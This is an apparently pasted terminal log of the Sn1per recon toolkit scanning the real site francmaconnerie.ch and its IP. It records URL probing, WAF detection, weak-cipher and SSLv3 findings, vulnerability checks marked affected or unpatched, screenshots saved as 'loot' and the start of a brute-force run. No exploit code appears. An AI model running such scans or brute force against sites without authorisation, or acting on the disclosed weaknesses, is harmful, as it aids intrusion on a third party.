- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 11 / 20 [1;37m][0;37m-[19:45:52][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/node/7[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 12 / 20 [1;37m][0;37m-[19:45:57][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/node/20[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 13 / 20 [1;37m][0;37m-[19:46:02][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/node/14[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 14 / 20 [1;37m][0;37m-[19:46:07][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Rudyard Kipling_poeme.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 15 / 20 [1;37m][0;37m-[19:46:12][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Planche sur La Mort_0.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 16 / 20 [1;37m][0;37m-[19:46:17][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Planche Etre ou Paraître.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 17 / 20 [1;37m][0;37m-[19:46:22][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Planche sur l invisible_0.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 18 / 20 [1;37m][0;37m-[19:46:27][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Planche Orateur sur L'Amour.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 19 / 20 [1;37m][0;37m-[19:46:32][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.francmaconnerie.ch/sites/default/files/Orateur à un nouvel initié Fratrie ou Fraternité.pdf[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m, , IP::0 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mConnection timed out after 5000 milliseconds[0m
- [1;37m[ INFO ] [ Shutting down ][0m
- [1;37m[ INFO ] [ End of process INURLBR at [07-01-2018 19:46:32][0m
- [1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-francmaconnerie.ch.txt ][0m
- [1;37m|_________________________________________________________________________________________[0m
- [1;37m\_________________________________________________________________________________________/[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 111 closed... skipping.[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [93m + -- --=[Port 443 opened... running tests...[0m
- [92m====================================================================================[0m
- [91m CHECKING FOR WAF [0m
- [92m====================================================================================[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://francmaconnerie.ch
- [92m====================================================================================[0m
- [91m GATHERING HTTP INFO [0m
- [92m====================================================================================[0m
- [1m[34mhttps://francmaconnerie.ch[0m [ Unassigned]
- [92m====================================================================================[0m
- [91m GATHERING SSL/TLS INFO [0m
- [92m====================================================================================[0m
- AVAILABLE PLUGINS
- -----------------
- PluginHSTS
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginSessionRenegotiation
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginHeartbleed
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- francmaconnerie.ch => WARNING: Could not connect (timeout); discarding corresponding tasks.
- SCAN COMPLETED IN 5.03 S
- ------------------------
- Version: [32m1.11.10-static[0m
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- [0m
- Testing SSL server [32mfrancmaconnerie.ch[0m on port [32m443[0m using SNI name [32mfrancmaconnerie.ch[0m
- [1;34mTLS Fallback SCSV:[0m
- Server [31mdoes not[0m support TLS Fallback SCSV
- [1;34mTLS renegotiation:[0m
- [32mSecure[0m session renegotiation supported
- [1;34mTLS Compression:[0m
- Compression [32mdisabled[0m
- [1;34mHeartbleed:[0m
- TLS 1.2 [32mnot vulnerable[0m to heartbleed
- TLS 1.1 [32mnot vulnerable[0m to heartbleed
- TLS 1.0 [32mnot vulnerable[0m to heartbleed
- [1;34mSupported Server Cipher(s):[0m
- [32mPreferred[0m [33mTLSv1.0[0m [32m256[0m bits DHE-RSA-AES256-SHA DHE [33m1024[0m bits
- Accepted [33mTLSv1.0[0m [32m256[0m bits AES256-SHA
- Accepted [33mTLSv1.0[0m [32m128[0m bits DHE-RSA-AES128-SHA DHE [33m1024[0m bits
- Accepted [33mTLSv1.0[0m [32m128[0m bits AES128-SHA
- Accepted [33mTLSv1.0[0m [32m128[0m bits [33mRC4-SHA [0m
- Accepted [33mTLSv1.0[0m [32m128[0m bits [33mRC4-MD5 [0m
- Accepted [33mTLSv1.0[0m [32m112[0m bits [33mEDH-RSA-DES-CBC3-SHA [0m DHE [33m1024[0m bits
- Accepted [33mTLSv1.0[0m [32m112[0m bits [33mDES-CBC3-SHA [0m
- Accepted [33mTLSv1.0[0m [31m56[0m bits [33mEDH-RSA-DES-CBC-SHA [0m DHE [33m1024[0m bits
- Accepted [33mTLSv1.0[0m [31m56[0m bits [33mDES-CBC-SHA [0m
- Accepted [33mTLSv1.0[0m [31m40[0m bits [31mEXP-EDH-RSA-DES-CBC-SHA [0m DHE [31m512[0m bits
- Accepted [33mTLSv1.0[0m [31m40[0m bits [31mEXP-DES-CBC-SHA [0m RSA [31m512[0m bits
- Accepted [33mTLSv1.0[0m [31m40[0m bits [31mEXP-RC2-CBC-MD5 [0m RSA [31m512[0m bits
- Accepted [33mTLSv1.0[0m [31m40[0m bits [31mEXP-RC4-MD5 [0m RSA [31m512[0m bits
- [32mPreferred[0m [31mSSLv3[0m [32m256[0m bits [31mDHE-RSA-AES256-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m256[0m bits [31mAES256-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [31mDHE-RSA-AES128-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m128[0m bits [31mAES128-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [33mRC4-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [33mRC4-MD5 [0m
- Accepted [31mSSLv3[0m [32m112[0m bits [31mEDH-RSA-DES-CBC3-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m112[0m bits [31mDES-CBC3-SHA [0m
- Accepted [31mSSLv3[0m [31m56[0m bits [31mEDH-RSA-DES-CBC-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [31m56[0m bits [31mDES-CBC-SHA [0m
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-EDH-RSA-DES-CBC-SHA [0m DHE [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-DES-CBC-SHA [0m RSA [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-RC2-CBC-MD5 [0m RSA [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-RC4-MD5 [0m RSA [31m512[0m bits
- [1;34mSSL Certificate:[0m
- Signature Algorithm: [32msha256WithRSAEncryption[0m
- RSA Key Strength: 2048
- Subject: *.infomaniak.ch
- Altnames: DNS:*.infomaniak.ch, DNS:infomaniak.ch
- Issuer: COMODO RSA Domain Validation Secure Server CA
- [0m
- ░ ░ [0m
- [91m+ -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com[0m
- [94m+ -- --=[Checking for[0m[93m DROWN (SSLv2)[0m[94m: 93.88.240.208:443[0m
- [94m+ -- --=[Checking for[0m[93m HeartBleed[0m[94m: 93.88.240.208:443[0m
- [94m+ -- --=[Checking for[0m[93m OpenSSL CCS[0m[94m: 93.88.240.208:443[0m
- FAIL Remote host is affected
- [94m+ -- --=[Checking for[0m[93m Poodle (SSLv3)[0m[94m: 93.88.240.208:443[0m
- [32mPreferred[0m [31mSSLv3[0m [32m256[0m bits [31mDHE-RSA-AES256-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m256[0m bits [31mAES256-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [31mDHE-RSA-AES128-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m128[0m bits [31mAES128-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [33mRC4-SHA [0m
- Accepted [31mSSLv3[0m [32m128[0m bits [33mRC4-MD5 [0m
- Accepted [31mSSLv3[0m [32m112[0m bits [31mEDH-RSA-DES-CBC3-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [32m112[0m bits [31mDES-CBC3-SHA [0m
- Accepted [31mSSLv3[0m [31m56[0m bits [31mEDH-RSA-DES-CBC-SHA [0m DHE [33m1024[0m bits
- Accepted [31mSSLv3[0m [31m56[0m bits [31mDES-CBC-SHA [0m
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-EDH-RSA-DES-CBC-SHA [0m DHE [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-DES-CBC-SHA [0m RSA [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-RC2-CBC-MD5 [0m RSA [31m512[0m bits
- Accepted [31mSSLv3[0m [31m40[0m bits [31mEXP-RC4-MD5 [0m RSA [31m512[0m bits
- [94m+ -- --=[Checking for[0m[93m WinShock (MS14-066)[0m[94m: 93.88.240.208:443[0m
- Testing if OpenSSL supports the ciphers we are checking for: [92mYES[0m
- [94mTesting 93.88.240.208:443 for availability of SSL ciphers added in MS14-066...[0m
- Testing cipher DHE-RSA-AES256-GCM-SHA384: [91mUNSUPPORTED[0m
- Testing cipher DHE-RSA-AES128-GCM-SHA256: [91mUNSUPPORTED[0m
- Testing cipher AES256-GCM-SHA384: [91mUNSUPPORTED[0m
- Testing cipher AES128-GCM-SHA256: [91mUNSUPPORTED[0m
- Testing if IIS is running on port 443: [91mNO[0m
- [94mChecking if target system is running Windows Server 2012 or later...[0m
- Testing cipher ECDHE-RSA-AES256-SHA384: [91mUNSUPPORTED[0m
- Testing cipher ECDHE-RSA-AES256-SHA: [91mUNSUPPORTED[0m
- [94m93.88.240.208:443 is patched: [91mNO[0m[0m
- [91m+ -- --=[Scan Complete![0m
- [92m====================================================================================[0m
- [91m CHECKING HTTP HEADERS [0m
- [92m====================================================================================[0m
- [94m+ -- --=[Checking if X-Content options are enabled on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking HTTP methods on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking if TRACE method is enabled on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking for META tags on francmaconnerie.ch...[0m [93m
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
- [94m+ -- --=[Checking for open proxy on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Enumerating software on francmaconnerie.ch...[0m [93m
- Server: Apache
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on francmaconnerie.ch...[0m [93m
- about the error.
- <!--#else -->
- If you entered the URL manually please check your
- spelling and try again.
- <!--#endif -->
- <!--#include virtual="include/bottom.html" -->
- [94m+ -- --=[Checking for Silverlight cross-domain policy on francmaconnerie.ch...[0m [93m
- about the error.
- <!--#else -->
- If you entered the URL manually please check your
- spelling and try again.
- <!--#endif -->
- <!--#include virtual="include/bottom.html" -->
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on francmaconnerie.ch...[0m [93m
- User-agent: *
- Crawl-delay: 10
- [94m+ -- --=[Retrieving sitemap.xml on francmaconnerie.ch...[0m [93m
- about the error.
- <!--#else -->
- If you entered the URL manually please check your
- spelling and try again.
- <!--#endif -->
- <!--#include virtual="include/bottom.html" -->
- [94m+ -- --=[Checking cookie attributes on francmaconnerie.ch...[0m [93m
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on francmaconnerie.ch...[0m [93m
- about the error.
- about the error.
- [0m
- [92m====================================================================================[0m
- [91m SAVING SCREENSHOTS [0m
- [92m====================================================================================[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/francmaconnerie.ch-port443.jpg
- [92m====================================================================================[0m
- [91m SCANNING FOR COMMON VULNERABILITIES [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m SKIPPING FULL NMAP PORT SCAN [0m
- [92m====================================================================================[0m
- [92m====================================================================================[0m
- [91m RUNNING BRUTE FORCE [0m
- [92m====================================================================================[0m
- [91m __________ __ ____ ___[0m
- [91m \______ \_______ __ ___/ |_ ____ \ \/ /[0m
- [91m | | _/\_ __ \ | \ __\/ __ \ \ / [0m
- [91m | | \ | | \/ | /| | \ ___/ / \ [0m
- [91m |______ / |__| |____/ |__| \___ >___/\ \ [0m
- [91m \/ \/ \_/[0m
- [91m + -- --=[BruteX v1.7 by 1N3[0m
- [91m + -- --=[http://crowdshield.com[0m
- #######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement